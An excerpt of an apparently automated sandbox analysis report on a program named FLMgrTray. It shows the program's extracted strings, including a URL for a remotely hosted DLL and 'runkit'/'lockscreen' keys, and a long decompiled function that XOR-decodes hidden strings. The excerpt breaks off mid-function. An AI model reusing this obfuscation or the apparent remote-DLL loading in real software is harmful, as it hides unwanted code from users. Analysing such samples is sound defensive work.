                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentVariablememmovememset
                                                                                        • String ID: RunTip$TEMP$^L9$^L9$^R=$delay$http://static.flmgr.net/kit/KitTip.dll$lockscreen$param$pushkit$pushlock$runkit$url
                                                                                        • API String ID: 3060213048-2484265426
                                                                                        • Opcode ID: 6928bba4aebcf925208c8c15b1c68566b9760087187e58eb331b1d7343d85bdb
                                                                                        • Instruction ID: 80a9ce71ee6fd787d06273e49a7f2af040f57c8ff380b717cf08ac7dfeb0e480
                                                                                        • Opcode Fuzzy Hash: 6928bba4aebcf925208c8c15b1c68566b9760087187e58eb331b1d7343d85bdb
                                                                                        • Instruction Fuzzy Hash: 9A62E331D102589BDB16EB74CC5A7DDB774AF69300F40839AE409B76A2EF30ABC58B51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 17%
                                                                                        			E0016CB90(void* __ebx, intOrPtr __ecx, void* __edi, signed int _a20) {
                                                                                        				char _v0;
                                                                                        				struct HINSTANCE__* _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				char _v64;
                                                                                        				char _v112;
                                                                                        				short _v540;
                                                                                        				signed int _v544;
                                                                                        				struct HINSTANCE__* _v548;
                                                                                        				char _v564;
                                                                                        				char _v568;
                                                                                        				char _v572;
                                                                                        				signed int _v576;
                                                                                        				signed int _v580;
                                                                                        				char _v592;
                                                                                        				void _v596;
                                                                                        				short _v600;
                                                                                        				signed int _v604;
                                                                                        				struct HINSTANCE__* _v608;
                                                                                        				char _v624;
                                                                                        				char _v628;
                                                                                        				signed int _v632;
                                                                                        				struct HINSTANCE__* _v636;
                                                                                        				char _v652;
                                                                                        				signed int _v656;
                                                                                        				struct HINSTANCE__* _v660;
                                                                                        				char _v676;
                                                                                        				signed int _v680;
                                                                                        				struct HINSTANCE__* _v684;
                                                                                        				char _v700;
                                                                                        				signed int _v704;
                                                                                        				struct HINSTANCE__* _v708;
                                                                                        				short _v724;
                                                                                        				signed int _v728;
                                                                                        				struct HINSTANCE__* _v732;
                                                                                        				short _v748;
                                                                                        				struct _WIN32_FIND_DATAW _v1340;
                                                                                        				signed int _v1344;
                                                                                        				void* _v1348;
                                                                                        				signed int _v1352;
                                                                                        				intOrPtr _v1356;
                                                                                        				struct HINSTANCE__* _v1392;
                                                                                        				char _v1400;
                                                                                        				signed int _v1404;
                                                                                        				char _v1492;
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t364;
                                                                                        				signed int _t365;
                                                                                        				signed int _t367;
                                                                                        				short _t368;
                                                                                        				char _t377;
                                                                                        				intOrPtr _t381;
                                                                                        				signed int _t384;
                                                                                        				char _t392;
                                                                                        				void* _t394;
                                                                                        				intOrPtr _t396;
                                                                                        				signed int _t399;
                                                                                        				intOrPtr _t401;
                                                                                        				short _t404;
                                                                                        				intOrPtr _t406;
                                                                                        				intOrPtr _t416;
                                                                                        				signed int _t423;
                                                                                        				signed int _t424;
                                                                                        				intOrPtr _t439;
                                                                                        				signed int _t450;
                                                                                        				unsigned int _t452;
                                                                                        				void* _t455;
                                                                                        				void* _t457;
                                                                                        				void* _t468;
                                                                                        				intOrPtr _t473;
                                                                                        				intOrPtr _t476;
                                                                                        				intOrPtr _t479;
                                                                                        				intOrPtr _t482;
                                                                                        				void* _t485;
                                                                                        				intOrPtr _t488;
                                                                                        				intOrPtr _t489;
                                                                                        				struct HINSTANCE__* _t490;
                                                                                        				intOrPtr _t491;
                                                                                        				struct HINSTANCE__* _t492;
                                                                                        				intOrPtr _t493;
                                                                                        				struct HINSTANCE__* _t494;
                                                                                        				intOrPtr _t495;
                                                                                        				struct HINSTANCE__* _t496;
                                                                                        				intOrPtr _t497;
                                                                                        				struct HINSTANCE__* _t498;
                                                                                        				int _t500;
                                                                                        				intOrPtr _t524;
                                                                                        				intOrPtr _t549;
                                                                                        				intOrPtr _t555;
                                                                                        				void* _t598;
                                                                                        				char* _t604;
                                                                                        				intOrPtr* _t608;
                                                                                        				char* _t615;
                                                                                        				intOrPtr* _t619;
                                                                                        				intOrPtr* _t623;
                                                                                        				intOrPtr* _t627;
                                                                                        				intOrPtr* _t631;
                                                                                        				signed int _t637;
                                                                                        				intOrPtr _t644;
                                                                                        				unsigned int _t646;
                                                                                        				short _t661;
                                                                                        				intOrPtr _t662;
                                                                                        				intOrPtr _t663;
                                                                                        				intOrPtr _t664;
                                                                                        				void* _t665;
                                                                                        				intOrPtr* _t666;
                                                                                        				intOrPtr* _t669;
                                                                                        				intOrPtr* _t672;
                                                                                        				intOrPtr* _t675;
                                                                                        				intOrPtr* _t678;
                                                                                        				intOrPtr* _t681;
                                                                                        				intOrPtr* _t690;
                                                                                        				intOrPtr* _t692;
                                                                                        				intOrPtr* _t694;
                                                                                        				intOrPtr* _t696;
                                                                                        				intOrPtr* _t698;
                                                                                        				intOrPtr* _t700;
                                                                                        				char _t702;
                                                                                        				intOrPtr _t703;
                                                                                        				void* _t713;
                                                                                        				void* _t720;
                                                                                        				void* _t721;
                                                                                        				void* _t725;
                                                                                        				void* _t726;
                                                                                        				void* _t727;
                                                                                        				void* _t728;
                                                                                        				signed int _t733;
                                                                                        				void* _t734;
                                                                                        				signed int _t735;
                                                                                        				signed int _t736;
                                                                                        				signed int _t737;
                                                                                        				signed int _t738;
                                                                                        				signed int _t739;
                                                                                        				signed int _t740;
                                                                                        				void* _t741;
                                                                                        				void* _t742;
                                                                                        				void* _t743;
                                                                                        				void* _t744;
                                                                                        				void* _t745;
                                                                                        				void* _t746;
                                                                                        				void* _t747;
                                                                                        				void* _t748;
                                                                                        				void* _t749;
                                                                                        				void* _t750;
                                                                                        				void* _t751;
                                                                                        				struct HINSTANCE__* _t752;
                                                                                        				struct HINSTANCE__* _t753;
                                                                                        				struct HINSTANCE__* _t754;
                                                                                        				struct HINSTANCE__* _t755;
                                                                                        				struct HINSTANCE__* _t756;
                                                                                        				struct HINSTANCE__* _t757;
                                                                                        				void* _t758;
                                                                                        				void* _t759;
                                                                                        				intOrPtr _t773;
                                                                                        				signed int _t775;
                                                                                        				signed int _t776;
                                                                                        				struct HINSTANCE__* _t778;
                                                                                        				signed int _t780;
                                                                                        				signed int _t781;
                                                                                        				signed int _t782;
                                                                                        				void* _t788;
                                                                                        				void* _t789;
                                                                                        				void* _t794;
                                                                                        				void* _t796;
                                                                                        				void* _t798;
                                                                                        				void* _t800;
                                                                                        				void* _t802;
                                                                                        				void* _t804;
                                                                                        				void* _t807;
                                                                                        				void* _t808;
                                                                                        				void* _t809;
                                                                                        				void* _t810;
                                                                                        				void* _t811;
                                                                                        				void* _t812;
                                                                                        				signed int _t814;
                                                                                        				signed int _t815;
                                                                                        				signed int _t816;
                                                                                        				signed int _t817;
                                                                                        				signed int _t818;
                                                                                        				signed int _t819;
                                                                                        				void* _t820;
                                                                                        				void* _t821;
                                                                                        				signed int _t822;
                                                                                        				void* _t826;
                                                                                        
                                                                                        				_t598 = __ebx;
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018D3AF);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t821 = _t820 - 0x53c;
                                                                                        				_t364 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t365 = _t364 ^ _t818;
                                                                                        				_v20 = _t365;
                                                                                        				_push(__edi);
                                                                                        				_push(_t365);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_v1356 = __ecx;
                                                                                        				_v1344 = 0;
                                                                                        				_t780 = 0;
                                                                                        				asm("movups xmm0, [0x19085c]");
                                                                                        				_t367 =  *0x190874; // 0x250047
                                                                                        				_t773 =  *0x19dc40; // 0x5
                                                                                        				_v604 = _t367;
                                                                                        				_t368 =  *0x190878; // 0x41
                                                                                        				_v600 = _t368;
                                                                                        				asm("movups [ebp-0x270], xmm0");
                                                                                        				asm("movq xmm0, [0x19086c]");
                                                                                        				asm("movq [ebp-0x260], xmm0");
                                                                                        				if(_t773 >= 2) {
                                                                                        					asm("movaps xmm2, [0x18ffd0]");
                                                                                        					_t780 = 8;
                                                                                        					asm("movaps xmm4, [0x190d30]");
                                                                                        					asm("movaps xmm1, xmm2");
                                                                                        					asm("punpckldq xmm1, xmm2");
                                                                                        					asm("movaps xmm0, xmm2");
                                                                                        					asm("punpckhdq xmm0, xmm2");
                                                                                        					asm("pmuldq xmm0, xmm4");
                                                                                        					asm("pmuldq xmm1, xmm4");
                                                                                        					asm("shufps xmm1, xmm0, 0xdd");
                                                                                        					asm("paddd xmm1, xmm2");
                                                                                        					asm("movd xmm5, eax");
                                                                                        					asm("psrad xmm1, xmm5");
                                                                                        					asm("movd xmm6, ecx");
                                                                                        					asm("movaps xmm0, xmm1");
                                                                                        					asm("psrld xmm0, xmm6");
                                                                                        					asm("paddd xmm0, xmm1");
                                                                                        					asm("pmulld xmm0, [0x190d00]");
                                                                                        					asm("psubd xmm2, xmm0");
                                                                                        					asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        					asm("movaps xmm2, [0x18ffe0]");
                                                                                        					asm("paddd xmm2, [0x18ffd0]");
                                                                                        					asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        					asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        					asm("paddw xmm1, [0x190000]");
                                                                                        					asm("movq xmm0, [eax]");
                                                                                        					asm("pxor xmm1, xmm0");
                                                                                        					asm("movaps xmm0, xmm2");
                                                                                        					asm("movq [ebp-0x270], xmm1");
                                                                                        					asm("movaps xmm1, xmm2");
                                                                                        					asm("punpckhdq xmm0, xmm2");
                                                                                        					asm("punpckldq xmm1, xmm2");
                                                                                        					asm("pmuldq xmm0, xmm4");
                                                                                        					asm("pmuldq xmm1, xmm4");
                                                                                        					asm("shufps xmm1, xmm0, 0xdd");
                                                                                        					asm("paddd xmm1, xmm2");
                                                                                        					asm("psrad xmm1, xmm5");
                                                                                        					asm("movaps xmm0, xmm1");
                                                                                        					asm("psrld xmm0, xmm6");
                                                                                        					asm("paddd xmm0, xmm1");
                                                                                        					asm("pmulld xmm0, [0x190d00]");
                                                                                        					asm("psubd xmm2, xmm0");
                                                                                        					asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        					asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        					asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        					asm("movq xmm0, [ebp-0x268]");
                                                                                        					asm("paddw xmm1, [0x190000]");
                                                                                        					asm("pxor xmm1, xmm0");
                                                                                        					asm("movq [ebp-0x268], xmm1");
                                                                                        				}
                                                                                        				goto L2;
                                                                                        				do {
                                                                                        					L4:
                                                                                        					_t377 =  *_t604;
                                                                                        					_t604 = _t604 + 2;
                                                                                        				} while (_t377 != 0);
                                                                                        				_push(_t604 - _t720 >> 1);
                                                                                        				E00163540(_t598, _t720, _t773,  &_v628);
                                                                                        				asm("movups xmm0, [0x19087c]");
                                                                                        				_v8 = 0;
                                                                                        				asm("movups [ebp-0x230], xmm0");
                                                                                        				asm("movq xmm0, [0x19088c]");
                                                                                        				asm("movq [ebp-0x220], xmm0");
                                                                                        				if( *0x190892 != 0) {
                                                                                        					_t817 = 0;
                                                                                        					if(_t773 >= 2) {
                                                                                        						asm("movaps xmm2, [0x18ffd0]");
                                                                                        						asm("movaps xmm4, [0x190d30]");
                                                                                        						asm("movaps xmm1, xmm2");
                                                                                        						asm("punpckldq xmm1, xmm2");
                                                                                        						asm("movaps xmm0, xmm2");
                                                                                        						asm("punpckhdq xmm0, xmm2");
                                                                                        						_t817 = 8;
                                                                                        						asm("pmuldq xmm0, xmm4");
                                                                                        						asm("pmuldq xmm1, xmm4");
                                                                                        						asm("shufps xmm1, xmm0, 0xdd");
                                                                                        						asm("paddd xmm1, xmm2");
                                                                                        						asm("movd xmm5, eax");
                                                                                        						asm("psrad xmm1, xmm5");
                                                                                        						asm("movaps xmm0, xmm1");
                                                                                        						asm("movd xmm6, eax");
                                                                                        						asm("psrld xmm0, xmm6");
                                                                                        						asm("paddd xmm0, xmm1");
                                                                                        						asm("pmulld xmm0, [0x190d00]");
                                                                                        						asm("psubd xmm2, xmm0");
                                                                                        						asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        						asm("movaps xmm2, [0x18ffe0]");
                                                                                        						asm("paddd xmm2, [0x18ffd0]");
                                                                                        						asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        						asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        						asm("movq xmm0, [0x190000]");
                                                                                        						asm("paddw xmm1, xmm0");
                                                                                        						asm("movq xmm0, [eax]");
                                                                                        						asm("pxor xmm1, xmm0");
                                                                                        						asm("movaps xmm0, xmm2");
                                                                                        						asm("movq [ebp-0x230], xmm1");
                                                                                        						asm("movaps xmm1, xmm2");
                                                                                        						asm("punpckhdq xmm0, xmm2");
                                                                                        						asm("punpckldq xmm1, xmm2");
                                                                                        						asm("pmuldq xmm0, xmm4");
                                                                                        						asm("pmuldq xmm1, xmm4");
                                                                                        						asm("shufps xmm1, xmm0, 0xdd");
                                                                                        						asm("paddd xmm1, xmm2");
                                                                                        						asm("psrad xmm1, xmm5");
                                                                                        						asm("movaps xmm0, xmm1");
                                                                                        						asm("psrld xmm0, xmm6");
                                                                                        						asm("paddd xmm0, xmm1");
                                                                                        						asm("pmulld xmm0, [0x190d00]");
                                                                                        						asm("psubd xmm2, xmm0");
                                                                                        						asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        						asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        						asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        						asm("movq xmm0, [0x190000]");
                                                                                        						asm("paddw xmm1, xmm0");
                                                                                        						asm("movq xmm0, [ebp-0x228]");
                                                                                        						asm("pxor xmm1, xmm0");
                                                                                        						asm("movq [ebp-0x228], xmm1");
                                                                                        					}
                                                                                        					do {
                                                                                        						 *(_t818 + _t817 * 2 - 0x230) =  *(_t818 + _t817 * 2 - 0x230) ^ (0x00000001 - ((0xa0a0a0a1 * _t817 >> 0x00000020) + _t817 >> 0x00000005 >> 0x0000001f) + ((0xa0a0a0a1 * _t817 >> 0x00000020) + _t817 >> 0x00000005)) * 0x00000033 + _t817;
                                                                                        						_t817 = _t817 + 1;
                                                                                        					} while (_t817 < 0xc);
                                                                                        				}
                                                                                        				_v608 = 0;
                                                                                        				_t608 =  &_v564;
                                                                                        				_v604 = 7;
                                                                                        				_v624 = 0;
                                                                                        				_t721 = _t608 + 2;
                                                                                        				goto L10;
                                                                                        				do {
                                                                                        					L15:
                                                                                        					_t392 =  *_t615;
                                                                                        					_t615 = _t615 + 2;
                                                                                        				} while (_t392 != 0);
                                                                                        				_push(_t615 - _t725 >> 1);
                                                                                        				_t394 = E00163540(_t598, _t725, _t773,  &_v568);
                                                                                        				asm("movups xmm0, [0x1908b0]");
                                                                                        				_v8 = 2;
                                                                                        				asm("movups [ebp-0x238], xmm0");
                                                                                        				asm("movups xmm0, [0x1908c0]");
                                                                                        				asm("pextrw eax, xmm0, 0x7");
                                                                                        				asm("movups [ebp-0x228], xmm0");
                                                                                        				if(_t394 != 0) {
                                                                                        					_t816 = 0;
                                                                                        					if(_t773 < 2) {
                                                                                        						do {
                                                                                        							 *(_t818 + _t816 * 2 - 0x238) =  *(_t818 + _t816 * 2 - 0x238) ^ (0x00000001 - ((0xa0a0a0a1 * _t816 >> 0x00000020) + _t816 >> 0x00000005 >> 0x0000001f) + ((0xa0a0a0a1 * _t816 >> 0x00000020) + _t816 >> 0x00000005)) * 0x00000033 + _t816;
                                                                                        							_t816 = _t816 + 1;
                                                                                        						} while (_t816 < 0x10);
                                                                                        					} else {
                                                                                        						asm("movaps xmm4, [0x18ffd0]");
                                                                                        						asm("movaps xmm3, [0x190d30]");
                                                                                        						_t713 = 0;
                                                                                        						asm("movaps xmm6, [0x190d00]");
                                                                                        						asm("movd xmm5, eax");
                                                                                        						asm("movd xmm7, eax");
                                                                                        						asm("o16 nop [eax+eax]");
                                                                                        						do {
                                                                                        							asm("movd xmm0, ecx");
                                                                                        							asm("pshufd xmm2, xmm0, 0x0");
                                                                                        							asm("paddd xmm2, xmm4");
                                                                                        							asm("movaps xmm1, xmm2");
                                                                                        							asm("movaps xmm0, xmm2");
                                                                                        							asm("punpckhdq xmm0, xmm2");
                                                                                        							asm("punpckldq xmm1, xmm2");
                                                                                        							asm("pmuldq xmm0, xmm3");
                                                                                        							asm("pmuldq xmm1, xmm3");
                                                                                        							asm("shufps xmm1, xmm0, 0xdd");
                                                                                        							asm("paddd xmm1, xmm2");
                                                                                        							asm("psrad xmm1, xmm5");
                                                                                        							asm("movaps xmm0, xmm1");
                                                                                        							asm("psrld xmm0, xmm7");
                                                                                        							asm("paddd xmm0, xmm1");
                                                                                        							asm("pmulld xmm0, xmm6");
                                                                                        							asm("psubd xmm2, xmm0");
                                                                                        							asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        							asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        							asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        							asm("movq xmm0, [0x190000]");
                                                                                        							asm("paddw xmm1, xmm0");
                                                                                        							asm("movq xmm0, [ebp+ecx*2-0x238]");
                                                                                        							asm("pxor xmm1, xmm0");
                                                                                        							asm("movd xmm0, eax");
                                                                                        							asm("pshufd xmm2, xmm0, 0x0");
                                                                                        							asm("movq [ebp+ecx*2-0x238], xmm1");
                                                                                        							asm("paddd xmm2, xmm4");
                                                                                        							asm("movaps xmm1, xmm2");
                                                                                        							asm("movaps xmm0, xmm2");
                                                                                        							asm("punpckhdq xmm0, xmm2");
                                                                                        							asm("punpckldq xmm1, xmm2");
                                                                                        							asm("pmuldq xmm0, xmm3");
                                                                                        							asm("pmuldq xmm1, xmm3");
                                                                                        							asm("shufps xmm1, xmm0, 0xdd");
                                                                                        							asm("paddd xmm1, xmm2");
                                                                                        							asm("psrad xmm1, xmm5");
                                                                                        							asm("movaps xmm0, xmm1");
                                                                                        							asm("psrld xmm0, xmm7");
                                                                                        							asm("paddd xmm0, xmm1");
                                                                                        							asm("pmulld xmm0, xmm6");
                                                                                        							asm("psubd xmm2, xmm0");
                                                                                        							asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        							asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        							asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        							asm("movq xmm0, [0x190000]");
                                                                                        							asm("paddw xmm1, xmm0");
                                                                                        							asm("movq xmm0, [ebp+ecx*2-0x230]");
                                                                                        							asm("pxor xmm1, xmm0");
                                                                                        							asm("movq [ebp+ecx*2-0x230], xmm1");
                                                                                        							_t713 = _t713 + 8;
                                                                                        						} while (_t713 < 0x10);
                                                                                        					}
                                                                                        				}
                                                                                        				_v684 = 0;
                                                                                        				_t619 =  &_v572;
                                                                                        				_v680 = 7;
                                                                                        				_v700 = 0;
                                                                                        				_t726 = _t619 + 2;
                                                                                        				do {
                                                                                        					_t396 =  *_t619;
                                                                                        					_t619 = _t619 + 2;
                                                                                        				} while (_t396 != 0);
                                                                                        				_push(_t619 - _t726 >> 1);
                                                                                        				E00163540(_t598, _t726, _t773,  &_v572);
                                                                                        				asm("movups xmm0, [0x1908d0]");
                                                                                        				_t399 =  *0x1908e8; // 0x40005a
                                                                                        				_v8 = 3;
                                                                                        				asm("movups [ebp-0x234], xmm0");
                                                                                        				_v544 = _t399;
                                                                                        				asm("movq xmm0, [0x1908e0]");
                                                                                        				asm("movq [ebp-0x224], xmm0");
                                                                                        				if( *0x1908ea != 0) {
                                                                                        					_t815 = 0;
                                                                                        					if(_t773 >= 2) {
                                                                                        						asm("movaps xmm2, [0x18ffd0]");
                                                                                        						asm("movaps xmm4, [0x190d30]");
                                                                                        						asm("movaps xmm1, xmm2");
                                                                                        						asm("punpckldq xmm1, xmm2");
                                                                                        						asm("movaps xmm0, xmm2");
                                                                                        						asm("punpckhdq xmm0, xmm2");
                                                                                        						_t815 = 8;
                                                                                        						asm("pmuldq xmm0, xmm4");
                                                                                        						asm("pmuldq xmm1, xmm4");
                                                                                        						asm("shufps xmm1, xmm0, 0xdd");
                                                                                        						asm("paddd xmm1, xmm2");
                                                                                        						asm("movd xmm5, eax");
                                                                                        						asm("psrad xmm1, xmm5");
                                                                                        						asm("movaps xmm0, xmm1");
                                                                                        						asm("movd xmm6, eax");
                                                                                        						asm("psrld xmm0, xmm6");
                                                                                        						asm("paddd xmm0, xmm1");
                                                                                        						asm("pmulld xmm0, [0x190d00]");
                                                                                        						asm("psubd xmm2, xmm0");
                                                                                        						asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        						asm("movaps xmm2, [0x18ffe0]");
                                                                                        						asm("paddd xmm2, [0x18ffd0]");
                                                                                        						asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        						asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        						asm("movq xmm0, [0x190000]");
                                                                                        						asm("paddw xmm1, xmm0");
                                                                                        						asm("movq xmm0, [eax]");
                                                                                        						asm("pxor xmm1, xmm0");
                                                                                        						asm("movaps xmm0, xmm2");
                                                                                        						asm("movq [ebp-0x234], xmm1");
                                                                                        						asm("movaps xmm1, xmm2");
                                                                                        						asm("punpckhdq xmm0, xmm2");
                                                                                        						asm("punpckldq xmm1, xmm2");
                                                                                        						asm("pmuldq xmm0, xmm4");
                                                                                        						asm("pmuldq xmm1, xmm4");
                                                                                        						asm("shufps xmm1, xmm0, 0xdd");
                                                                                        						asm("paddd xmm1, xmm2");
                                                                                        						asm("psrad xmm1, xmm5");
                                                                                        						asm("movaps xmm0, xmm1");
                                                                                        						asm("psrld xmm0, xmm6");
                                                                                        						asm("paddd xmm0, xmm1");
                                                                                        						asm("pmulld xmm0, [0x190d00]");
                                                                                        						asm("psubd xmm2, xmm0");
                                                                                        						asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        						asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        						asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        						asm("movq xmm0, [0x190000]");
                                                                                        						asm("paddw xmm1, xmm0");
                                                                                        						asm("movq xmm0, [ebp-0x22c]");
                                                                                        						asm("pxor xmm1, xmm0");
                                                                                        						asm("movq [ebp-0x22c], xmm1");
                                                                                        						asm("o16 nop [eax+eax]");
                                                                                        					}
                                                                                        					do {
                                                                                        						 *(_t818 + _t815 * 2 - 0x234) =  *(_t818 + _t815 * 2 - 0x234) ^ (0x00000001 - ((0xa0a0a0a1 * _t815 >> 0x00000020) + _t815 >> 0x00000005 >> 0x0000001f) + ((0xa0a0a0a1 * _t815 >> 0x00000020) + _t815 >> 0x00000005)) * 0x00000033 + _t815;
                                                                                        						_t815 = _t815 + 1;
                                                                                        					} while (_t815 < 0xe);
                                                                                        				}
                                                                                        				_v660 = 0;
                                                                                        				_t623 =  &_v568;
                                                                                        				_v656 = 7;
                                                                                        				_v676 = 0;
                                                                                        				_t727 = _t623 + 2;
                                                                                        				do {
                                                                                        					_t401 =  *_t623;
                                                                                        					_t623 = _t623 + 2;
                                                                                        				} while (_t401 != 0);
                                                                                        				_push(_t623 - _t727 >> 1);
                                                                                        				E00163540(_t598, _t727, _t773,  &_v568);
                                                                                        				asm("movups xmm0, [0x1908ec]");
                                                                                        				_t404 = L"^<*.*"; // 0x3c005e
                                                                                        				_v8 = 4;
                                                                                        				asm("movups [ebp-0x24c], xmm0");
                                                                                        				_v576 = _t404;
                                                                                        				if(L"<*.*" != 0) {
                                                                                        					_t814 = 0;
                                                                                        					do {
                                                                                        						 *(_t818 + _t814 * 2 - 0x24c) =  *(_t818 + _t814 * 2 - 0x24c) ^ (0x00000001 - ((0xa0a0a0a1 * _t814 >> 0x00000020) + _t814 >> 0x00000005 >> 0x0000001f) + ((0xa0a0a0a1 * _t814 >> 0x00000020) + _t814 >> 0x00000005)) * 0x00000033 + _t814;
                                                                                        						_t814 = _t814 + 1;
                                                                                        					} while (_t814 < 0xa);
                                                                                        				}
                                                                                        				_v636 = 0;
                                                                                        				_t627 =  &_v592;
                                                                                        				_v632 = 7;
                                                                                        				_v652 = 0;
                                                                                        				_t728 = _t627 + 2;
                                                                                        				do {
                                                                                        					_t406 =  *_t627;
                                                                                        					_t627 = _t627 + 2;
                                                                                        				} while (_t406 != 0);
                                                                                        				_push(_t627 - _t728 >> 1);
                                                                                        				E00163540(_t598, _t728, _t773,  &_v592);
                                                                                        				_v8 = 5;
                                                                                        				memset( &_v540, 0, 0x208);
                                                                                        				_t822 = _t821 + 0xc;
                                                                                        				GetModuleFileNameW(0,  &_v540, 0x208);
                                                                                        				PathRemoveFileSpecW( &_v540);
                                                                                        				_v580 = 0;
                                                                                        				_t631 =  &_v540;
                                                                                        				_v576 = 7;
                                                                                        				_v596 = 0;
                                                                                        				_t729 = _t631 + 2;
                                                                                        				do {
                                                                                        					_t416 =  *_t631;
                                                                                        					_t631 = _t631 + 2;
                                                                                        				} while (_t416 != 0);
                                                                                        				_push(_t631 - _t729 >> 1);
                                                                                        				E00163540(_t598, _t729, _t773,  &_v540);
                                                                                        				_t782 = _v580;
                                                                                        				_v8 = 6;
                                                                                        				_t133 = _t782 - 1; // -1
                                                                                        				if(_t782 <= _t133) {
                                                                                        					E00164210(_t598,  &_v596, _t773);
                                                                                        					goto L141;
                                                                                        				} else {
                                                                                        					_t646 = _v576;
                                                                                        					_v1344 = _t646;
                                                                                        					if(_t782 >= _t646) {
                                                                                        						_t729 = 0x7ffffffe;
                                                                                        						if(0x7ffffffe - _t782 < 1) {
                                                                                        							L141:
                                                                                        							E001631F0(_t729);
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							asm("int3");
                                                                                        							_push(_t818);
                                                                                        							_t819 = _t822;
                                                                                        							_push(0xffffffff);
                                                                                        							_push(E0018D3F0);
                                                                                        							_push( *[fs:0x0]);
                                                                                        							_t423 =  *0x19d05c; // 0x2c80d730
                                                                                        							_t424 = _t423 ^ _t819;
                                                                                        							_v1404 = _t424;
                                                                                        							_push(_t782);
                                                                                        							_push(_t424);
                                                                                        							 *[fs:0x0] =  &_v1400;
                                                                                        							_v1392 = 0;
                                                                                        							E00182540( &_v1492, _t729);
                                                                                        							_v1392 = 1;
                                                                                        							E00183380( &_v1492, 0x80000001);
                                                                                        							asm("movups xmm0, [0x190418]");
                                                                                        							_t637 = 0;
                                                                                        							asm("movups [ebp-0x38], xmm0");
                                                                                        							asm("movups xmm0, [0x190428]");
                                                                                        							asm("movups [ebp-0x28], xmm0");
                                                                                        							asm("movq xmm0, [0x190438]");
                                                                                        							asm("movq [ebp-0x18], xmm0");
                                                                                        							if( *0x19dc40 < 2) {
                                                                                        								L147:
                                                                                        								 *(_t819 + _t637 * 2 - 0x38) =  *(_t819 + _t637 * 2 - 0x38) ^ (0x00000001 - ((0xa0a0a0a1 * _t637 >> 0x00000020) + _t637 >> 0x00000005 >> 0x0000001f) + ((0xa0a0a0a1 * _t637 >> 0x00000020) + _t637 >> 0x00000005)) * 0x00000033 + _t637;
                                                                                        								_t637 = _t637 + 1;
                                                                                        							} else {
                                                                                        								asm("movaps xmm4, [0x18ffd0]");
                                                                                        								asm("movaps xmm3, [0x190d30]");
                                                                                        								asm("movaps xmm6, [0x190d00]");
                                                                                        								asm("movd xmm5, eax");
                                                                                        								asm("movd xmm7, eax");
                                                                                        								do {
                                                                                        									asm("movd xmm0, ecx");
                                                                                        									asm("pshufd xmm2, xmm0, 0x0");
                                                                                        									asm("paddd xmm2, xmm4");
                                                                                        									asm("movaps xmm1, xmm2");
                                                                                        									asm("movaps xmm0, xmm2");
                                                                                        									asm("punpckhdq xmm0, xmm2");
                                                                                        									asm("punpckldq xmm1, xmm2");
                                                                                        									asm("pmuldq xmm0, xmm3");
                                                                                        									asm("pmuldq xmm1, xmm3");
                                                                                        									asm("shufps xmm1, xmm0, 0xdd");
                                                                                        									asm("paddd xmm1, xmm2");
                                                                                        									asm("psrad xmm1, xmm5");
                                                                                        									asm("movaps xmm0, xmm1");
                                                                                        									asm("psrld xmm0, xmm7");
                                                                                        									asm("paddd xmm0, xmm1");
                                                                                        									asm("pmulld xmm0, xmm6");
                                                                                        									asm("psubd xmm2, xmm0");
                                                                                        									asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        									asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        									asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        									asm("movq xmm0, [0x190000]");
                                                                                        									asm("paddw xmm1, xmm0");
                                                                                        									asm("movq xmm0, [ebp+ecx*2-0x38]");
                                                                                        									asm("pxor xmm1, xmm0");
                                                                                        									asm("movd xmm0, eax");
                                                                                        									asm("pshufd xmm2, xmm0, 0x0");
                                                                                        									asm("movq [ebp+ecx*2-0x38], xmm1");
                                                                                        									asm("paddd xmm2, xmm4");
                                                                                        									asm("movaps xmm1, xmm2");
                                                                                        									asm("movaps xmm0, xmm2");
                                                                                        									asm("punpckhdq xmm0, xmm2");
                                                                                        									asm("punpckldq xmm1, xmm2");
                                                                                        									asm("pmuldq xmm0, xmm3");
                                                                                        									asm("pmuldq xmm1, xmm3");
                                                                                        									asm("shufps xmm1, xmm0, 0xdd");
                                                                                        									asm("paddd xmm1, xmm2");
                                                                                        									asm("psrad xmm1, xmm5");
                                                                                        									asm("movaps xmm0, xmm1");
